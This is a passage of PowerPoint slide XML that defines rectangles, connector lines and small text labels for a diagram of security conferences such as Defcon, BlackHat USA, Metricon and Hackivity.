              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36032" name="Rectangle 566"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1873"/>
                <a:ext cx="352" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36033" name="Line 567"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="416" y="1955"/>
                <a:ext cx="362" cy="77"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36034" name="Rectangle 568"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="305" y="1876"/>
                <a:ext cx="273" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Metricon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36035" name="Rectangle 569"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1030" y="2979"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36036" name="Rectangle 570"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1030" y="2979"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36037" name="Line 571"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1161" y="2586"/>
                <a:ext cx="41" cy="393"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36038" name="Rectangle 572"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1117" y="2986"/>
                <a:ext cx="75" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>G</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36039" name="Rectangle 573"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1160" y="2986"/>
                <a:ext cx="48" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>-</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36040" name="Rectangle 574"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1181" y="2986"/>
                <a:ext cx="144" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Con</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36041" name="Rectangle 575"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="624" y="2979"/>
                <a:ext cx="344" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36042" name="Rectangle 576"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="624" y="2979"/>
                <a:ext cx="344" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36043" name="Line 577"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="796" y="2298"/>
                <a:ext cx="178" cy="681"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36044" name="Rectangle 578"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="705" y="2986"/>
                <a:ext cx="230" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Defcon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36045" name="Rectangle 579"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2949" y="1214"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36046" name="Rectangle 580"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2949" y="1214"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36047" name="Line 581"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3070" y="1296"/>
                <a:ext cx="83" cy="441"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36048" name="Rectangle 582"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3035" y="1221"/>
                <a:ext cx="64" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>T</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36049" name="Rectangle 583"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3073" y="1221"/>
                <a:ext cx="64" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36050" name="Rectangle 584"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2040" y="2425"/>
                <a:ext cx="347" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36051" name="Rectangle 585"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2040" y="2425"/>
                <a:ext cx="347" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36052" name="Line 586"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2214" y="2100"/>
                <a:ext cx="828" cy="325"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36053" name="Rectangle 587"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2100" y="2431"/>
                <a:ext cx="283" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Hackivity</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36054" name="Rectangle 588"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="73" y="2979"/>
                <a:ext cx="460" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36055" name="Rectangle 589"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="73" y="2979"/>
                <a:ext cx="460" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36056" name="Line 590"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="303" y="2304"/>
                <a:ext cx="505" cy="675"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36057" name="Rectangle 591"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="123" y="2986"/>
                <a:ext cx="428" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Security Opus</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36058" name="Rectangle 592"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="321" y="2828"/>
                <a:ext cx="546" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36059" name="Rectangle 593"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="321" y="2828"/>
                <a:ext cx="546" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36060" name="Line 594"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="594" y="2295"/>
                <a:ext cx="381" cy="533"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36061" name="Rectangle 595"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="411" y="2831"/>
                <a:ext cx="433" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>BlackHat USA</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36062" name="Rectangle 596"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="170" y="2677"/>
                <a:ext cx="339" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36063" name="Rectangle 597"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="170" y="2677"/>
                <a:ext cx="339" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
